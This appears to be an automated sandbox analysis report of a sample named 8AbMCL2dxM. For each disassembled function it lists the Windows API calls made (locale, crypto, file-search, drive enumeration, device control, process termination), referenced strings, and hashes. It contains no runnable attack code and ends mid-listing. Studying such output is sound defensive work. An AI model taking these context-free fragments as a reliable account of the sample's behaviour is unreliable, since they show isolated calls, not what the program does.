                                        • Part of subcall function 009530E1: Concurrency::location::_Assign.LIBCMT ref: 009531DF
                                        • Part of subcall function 009530E1: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 009531E7
                                      Similarity
                                      • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                      • String ID:
                                      • API String ID: 2363638799-0
                                      • Opcode ID: 71b42c97c1e2fbb32730085475a073b3437bf9dbc9830c7f0946d127fa25da5a
                                      • Instruction ID: 5d45b31f7476e57f5c394e857dcfd150afee07cef57c9c1855c17abde6b409e8
                                      • Opcode Fuzzy Hash: 71b42c97c1e2fbb32730085475a073b3437bf9dbc9830c7f0946d127fa25da5a
                                      • Instruction Fuzzy Hash: A451A131A01205ABCF14DF55C896BAEB775AF48755F158069ED027B392CB30AF09CBA1
                                      APIs
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0097F78D,?,00000000), ref: 0097F507
                                      • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0097F78D,?,00000000), ref: 0097F530
                                      • GetACP.KERNEL32(?,?,0097F78D,?,00000000), ref: 0097F545
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: InfoLocale
                                      • String ID: ACP$OCP
                                      • API String ID: 2299586839-711371036
                                      • Opcode ID: 3df8075ae14dacc28e5afb7147bf593a9d67e889672c72181525ec7fa7e0e2c4
                                      • Instruction ID: a40a57128dc93db82afe1b0ebf660f795574bc2f691caf7bcf9b3ef74712fc2a
                                      • Opcode Fuzzy Hash: 3df8075ae14dacc28e5afb7147bf593a9d67e889672c72181525ec7fa7e0e2c4
                                      • Instruction Fuzzy Hash: 69219D33B04100ABDB308F68D825AB7B3AAAB50B54B56C474F90EE7120E732DE41C390
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BD8
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0097F74E
                                      • IsValidCodePage.KERNEL32(00000000), ref: 0097F7A9
                                      • IsValidLocale.KERNEL32(?,00000001), ref: 0097F7B8
                                      • GetLocaleInfoW.KERNEL32(?,00001001,00971475,00000040,?,00971595,00000055,00000000,?,?,00000055,00000000), ref: 0097F800
                                      • GetLocaleInfoW.KERNEL32(?,00001002,009714F5,00000040), ref: 0097F81F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                      • String ID:
                                      • API String ID: 745075371-0
                                      • Opcode ID: d6b16e532749f485744b184df75259b31496cda4d4208b0f7acf79e3e1d72972
                                      • Instruction ID: 62f7df14371132769a50d818d1524b3cf4a0274cef99df8fb71d1c0792e46cb6
                                      • Opcode Fuzzy Hash: d6b16e532749f485744b184df75259b31496cda4d4208b0f7acf79e3e1d72972
                                      • Instruction Fuzzy Hash: 5B513F73A04609ABDF24EFA5CC55ABA77B8BF44700F148476E518EB191E7709A04CB61
                                      APIs
                                      • GetLastError.KERNEL32(00000010,BA3649C5,75B4FC30,?), ref: 00914BE0
                                      • CryptReleaseContext.ADVAPI32(00000001,00000000,?,00000000,?,009962DC,00000002, operation failed with error ,0000001D,?,?,OS_Rng: ,00000008,?), ref: 00914F10
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ContextCryptErrorLastRelease
                                      • String ID: operation failed with error $OS_Rng:
                                      • API String ID: 3299239745-700108173
                                      • Opcode ID: fe47ca4ca2892e53f4a439079b74bc490e76aeaa3f1c1b39d599d2866cd505d2
                                      • Instruction ID: 27f42280a9ce9c8e031397746e9259831decd447433f2cbe4f8a8100a4b47d1d
                                      • Opcode Fuzzy Hash: fe47ca4ca2892e53f4a439079b74bc490e76aeaa3f1c1b39d599d2866cd505d2
                                      • Instruction Fuzzy Hash: 1AA1B471A102599FEB14CF68CD45BDDBBB5FF49304F108259E004AB292DB75AAC4CF61
                                      APIs
                                      • WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,BA3649C5), ref: 008B53FE
                                      • ReleaseSemaphore.KERNEL32(?,00000001,762330DF,BA3649C5), ref: 008B54D9
                                      • ___std_exception_destroy.LIBVCRUNTIME ref: 008B55E6
                                      Strings
                                      • boost shared_lock has no mutex, xrefs: 008B5554
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ObjectReleaseSemaphoreSingleWait___std_exception_destroy
                                      • String ID: boost shared_lock has no mutex
                                      • API String ID: 1459948668-3890706923
                                      • Opcode ID: 4ee2574f6a088f828b4605ae0d1220b3c7617b68b95c2dd778d93adf2e9473f3
                                      • Instruction ID: 69675210fc38e70b80d9026a26162ca9a91c325f7abea2aadff9b617fe8ca135
                                      • Opcode Fuzzy Hash: 4ee2574f6a088f828b4605ae0d1220b3c7617b68b95c2dd778d93adf2e9473f3
                                      • Instruction Fuzzy Hash: 5C81EEB1900A099BCB28DF58C952BFEB7A1FF44314F24416DE91AE7391DB74AE04CB90
                                      APIs
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5,00000000,?,00000000), ref: 008C8CD3
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002,009AFBF4,?,?,?), ref: 008C8D2F
                                      • SetErrorMode.KERNEL32(00008003,BA3649C5), ref: 008CB78D
                                      • FindFirstFileW.KERNEL32(?,?,009AFBF8,00000002), ref: 008CB7B5
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorFileFindFirstMode
                                      • String ID:
                                      • API String ID: 3909587737-0
                                      • Opcode ID: 0ce2daa0fd04f4429fb48029616988e98ae09a3c9b473f64afe972e81eeeb280
                                      • Instruction ID: 2927a77c535af2691f3ef7567fa917e68efc13af1cd7c32eb1d1149f81da180c
                                      • Opcode Fuzzy Hash: 0ce2daa0fd04f4429fb48029616988e98ae09a3c9b473f64afe972e81eeeb280
                                      • Instruction Fuzzy Hash: B1C1BF71A00109DBCB18DF68CC85BAEB7B5FB84314F50866DE819DB691DB34EA85CB90
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,0097147C,?,?,?,?,00970ED3,?,00000004), ref: 0097EDEC
                                      • _wcschr.LIBVCRUNTIME ref: 0097EE7C
                                      • _wcschr.LIBVCRUNTIME ref: 0097EE8A
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,0097147C,00000000,0097159C), ref: 0097EF2D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                      • String ID:
                                      • API String ID: 4212172061-0
                                      • Opcode ID: 8aafb2f0ea732676e39f532c69302dc85d77a51ff5cfc33d2504fe6f94f3ad85
                                      • Instruction ID: 16bef208334bf2368063a2b29622c47574605c2681546120900ecf2ad4c5bfd1
                                      • Opcode Fuzzy Hash: 8aafb2f0ea732676e39f532c69302dc85d77a51ff5cfc33d2504fe6f94f3ad85
                                      • Instruction Fuzzy Hash: 3C61C673600206AAD724AB75DC46FB677ACEF4C710F1484AAF90DD7191EB74ED4087A0
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0091E8CD
                                      Strings
                                      • TableSize, xrefs: 0091E228
                                      • : block size of underlying block cipher is not 16, xrefs: 0091E89E
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: : block size of underlying block cipher is not 16$TableSize
                                      • API String ID: 2005118841-2295039505
                                      • Opcode ID: cd43bde7868cb98808c74be34a2de00bfab660419ab29fb272562386a167f911
                                      • Instruction ID: 76f3170b25934df85440c86ed51b7131fdb2c9918a6e3635a878f457ff8ca20f
                                      • Opcode Fuzzy Hash: cd43bde7868cb98808c74be34a2de00bfab660419ab29fb272562386a167f911
                                      • Instruction Fuzzy Hash: 0132F7B5E042198FDB24CF69C844B9DF7B5BF98304F25866ED819A7352DB70A981CF80
                                      APIs
                                        • Part of subcall function 00914FF0: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0091507A
                                      • CryptGenRandom.ADVAPI32(00000000,?,?,BA3649C5), ref: 00914F9A
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00914FE9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Crypt$ContextException@8RandomReleaseThrow
                                      • String ID: CryptGenRandom
                                      • API String ID: 1047471967-3616286655
                                      • Opcode ID: a5d4b1172088425c396ee0d7aacc4a3aefe31f8fa305e318105d5f75d75fc131
                                      • Instruction ID: 9748f82f9b72bb4052c3354c6e6aa12d603e5084c5bae7696d488ba61a8778ef
                                      • Opcode Fuzzy Hash: a5d4b1172088425c396ee0d7aacc4a3aefe31f8fa305e318105d5f75d75fc131
                                      • Instruction Fuzzy Hash: 4E014C7194420CAFCB14EF94CC41FEEBBB8FB49720F40452AE812A7694DB74A608CB50
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: __onexit
                                      • String ID: Dflt$Dflt$Dflt$Dflt
                                      • API String ID: 1448380652-281602996
                                      • Opcode ID: 7ac3ef62736fbebed45c3bd7e8535261b207bc3e4af198d4059886231bac38a9
                                      • Instruction ID: 58f90009ef49bf1db0a9e28c2b034a78d2df5aea6e04d4e2e851e41d097cf787
                                      • Opcode Fuzzy Hash: 7ac3ef62736fbebed45c3bd7e8535261b207bc3e4af198d4059886231bac38a9
                                      • Instruction Fuzzy Hash: 4B113DB05AE744EBE701CF54EC1AB6A7BA4F38170CF00821AE5055B7E0C7BA1188EBD5
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 008F474D
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: cf7a1f52d9df86e35662a07889472a22f76900823f1962072456a03a4686c6fd
                                      • Instruction ID: 7a59e0280f055867acd7a570bbd5293980ea868e761e41b6a417263a52f19c2a
                                      • Opcode Fuzzy Hash: cf7a1f52d9df86e35662a07889472a22f76900823f1962072456a03a4686c6fd
                                      • Instruction Fuzzy Hash: 2AF12575A00249AFCB04DFA9C884AAEBBF5FF88310F14456AF919E7351DB31AD14CB91
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BD8
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F149
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F19A
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F25A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ErrorInfoLastLocale$_free$_abort
                                      • String ID:
                                      • API String ID: 2829624132-0
                                      • Opcode ID: c1404ef8f5e1be54234e5b8e8f08a9a516ce1ca29a563e3465969106848160e2
                                      • Instruction ID: 54ead198a0fb49fe67784ca3a6c76c13f2ac413323ada1582e8ba4e61cd404bc
                                      • Opcode Fuzzy Hash: c1404ef8f5e1be54234e5b8e8f08a9a516ce1ca29a563e3465969106848160e2
                                      • Instruction Fuzzy Hash: FF61B176A04207DBDF289F28DCA2BBA77A8FF44350F10C07AE919E6582E735D941DB50
                                      APIs
                                      • CreateFileW.KERNEL32(0093D47E,00000008,00000007,00000000,00000003,02200000,00000000,BA3649C5,?,00000000,?,0093D47E,?), ref: 0093D0A3
                                      • DeviceIoControl.KERNEL32(00000000,000900A8,00000000,00000000,00000000,00004000,?,00000000), ref: 0093D0EA
                                      • CloseHandle.KERNEL32(00000000), ref: 0093D124
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: CloseControlCreateDeviceFileHandle
                                      • String ID:
                                      • API String ID: 33631002-0
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002,00000000), ref: 009616AA
                                      • TerminateProcess.KERNEL32(00000000,?,0096165F,?,009CCA70,0000000C,009617B6,?,00000002,00000000), ref: 009616B1
                                      • ExitProcess.KERNEL32 ref: 009616C3
                                      Similarity
                                      • API ID: Process$CurrentExitTerminate
                                      • String ID:
                                      • API String ID: 1703294689-0
                                      Similarity
                                      • API ID:
                                      • String ID: .
                                      • API String ID: 0-248832578
                                      APIs
                                      • ___crtGetLocaleInfoEx.LIBCPMT ref: 0093C853
                                      Similarity
                                      • API ID: InfoLocale___crt
                                      • String ID: 2
                                      • API String ID: 3761071962-450215437
                                      APIs
                                        • Part of subcall function 0093FC80: GetProcessHeap.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCCB
                                        • Part of subcall function 0093FC80: HeapFree.KERNEL32(00000000,?,?,BA3649C5,0098EB50,000000FF,?,008B528A,BA3649C5,76226230), ref: 0093FCD2
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,?,00985DF0,000000FF), ref: 008EE2E3
                                      • HeapFree.KERNEL32(00000000,?,?,?,?,00985DF0,000000FF), ref: 008EE2EA
                                      Similarity
                                      • API ID: Heap$FreeProcess
                                      • String ID:
                                      • API String ID: 3859560861-0
                                      APIs
                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00972378,?,?,00000008,?,?,00983411,00000000), ref: 009725AA
                                      Similarity
                                      • API ID: ExceptionRaise
                                      • String ID:
                                      • API String ID: 3997070919-0
                                      APIs
                                      • GetLogicalDriveStringsA.KERNEL32(00000104,00000000), ref: 008CE1DC
                                      Similarity
                                      • API ID: DriveLogicalStrings
                                      • String ID:
                                      • API String ID: 2022863570-0
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BD8
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BE5
                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0097F399
                                      Similarity
                                      • API ID: ErrorLast$_free$InfoLocale_abort
                                      • String ID:
                                      • API String ID: 1663032902-0
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • EnumSystemLocalesW.KERNEL32(0097F0F5,00000001,00000000,?,00971475,?,0097F722,00000000,?,?,?), ref: 0097F03F
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0097F313,00000000,00000000,?), ref: 0097F5A1
                                      Similarity
                                      • API ID: ErrorLast$InfoLocale_abort_free
                                      • String ID:
                                      • API String ID: 2692324296-0
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • EnumSystemLocalesW.KERNEL32(0097F345,00000001,?,?,00971475,?,0097F6E6,00971475,?,?,?,?,?,00971475,?,?), ref: 0097F0B4
                                      Similarity
                                      • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                      • String ID:
                                      • API String ID: 1084509184-0
                                      APIs
                                        • Part of subcall function 0096CA1B: EnterCriticalSection.KERNEL32(?,?,0096D846,00000000,009CCD40,0000000C,0096D801,?,?,?,0097553B,?,?,00974C2E,00000001,00000364), ref: 0096CA2A
                                      • EnumSystemLocalesW.KERNEL32(009733EA,00000001,009CCE40,0000000C), ref: 00973468
                                      Similarity
                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                      • String ID:
                                      • API String ID: 1272433827-0
                                      APIs
                                        • Part of subcall function 00974B79: GetLastError.KERNEL32(000000FF,00000000,00961C08,00000000,00000000,?,009620EE,00000000,00000000,008EC60F,?,000000FF), ref: 00974B7D
                                        • Part of subcall function 00974B79: _free.LIBCMT ref: 00974BB0
                                        • Part of subcall function 00974B79: SetLastError.KERNEL32(00000000,00000000,008EC60F,?,000000FF), ref: 00974BF1
                                        • Part of subcall function 00974B79: _abort.LIBCMT ref: 00974BF7
                                      • EnumSystemLocalesW.KERNEL32(0097EED9,00000001,?,?,?,0097F744,00971475,?,?,?,?,?,00971475,?,?,?), ref: 0097EFB9
                                      Memory Dump Source
